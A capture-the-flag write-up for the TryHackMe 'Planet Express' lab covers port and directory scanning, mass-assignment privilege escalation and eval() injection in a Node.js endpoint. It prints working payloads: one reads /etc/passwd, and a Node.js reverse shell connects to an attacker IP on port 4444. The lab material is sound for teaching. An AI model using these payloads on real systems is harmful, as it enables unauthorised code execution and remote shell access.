AppSecExplained
Search
⌃K

THM: Planet Express (Hard)

Fast, affordable, and out of this world!
This CTF is not yet available publically, but hopefully soon!

Flag 1

Enumeration

We discover what ports are open, and se 80 HTTP and 22 SSH.
nmap 10.10.227.249
nmap results
We can scan for directories and leave that running while we explore the site manually.
ffuf -u http://10.10.227.249/FUZZ -w /usr/share/wordlists/dirb/common.txt
ffuf results
Browsing to /admin gives us an error.
access to /admin is denied
Register an account.
register an account
We still get access denied to the /admin endpoint. So we will try to create an account with admin privileges using mass assignment.

Exploitation

There are a number of combinations we can try, such as:
admin=true
admin=1
account=admin
account=administrator
privilege=admin
privilege=administrator
privs=true
privileges=admin
privileges=administrator
Writing a short script to create potential payloads is the easiest way to do this, but give the error message mentions "privilege" and "admin" we will focus on those.
creating an account and attempting mass assignment
We login to the account after it's created, and then try to access /admin.
/admin
We are successful! The first flag is given to us on the page.

Flag 2

Enumeration

Clicking "calculate price" gives updates the page with a number. And in our proxy we can see a POST request.
calculate price
/calculate-price

Exploitation

Sending modified requests indicates that the application may be passing the values into a function such as eval() as it can interpret things such as +1 and -1 correctly rather than throwing an error.
orderId=64294f0e569035c8dbe5cdb5&length=51&height=51&width=51&weight=5001
{"price":182661}
​
orderId=64294f0e569035c8dbe5cdb5&length=51&height=51&width=51&weight=5001-1
{"price":182660}
​
orderId=64294f0e569035c8dbe5cdb5&length=51&height=51&width=51&weight=5001/0
{"price":null}
We can test RCE with the following payload.
;fs=require('fs');fs.readFileSync('/etc/passwd').toString()
RCE
We can upgrade to a shell with the following payload.
;(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4444, "<your-ip>", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;})();
upgrading to a shell
catching the reverse shell
That's it! I hope you enjoyed the challenge and learned a bit about mass assignment and RCE in node.js applications
👍
​
If you like my content, please feel free to connect on LinkedIn or drop into one of our live streams!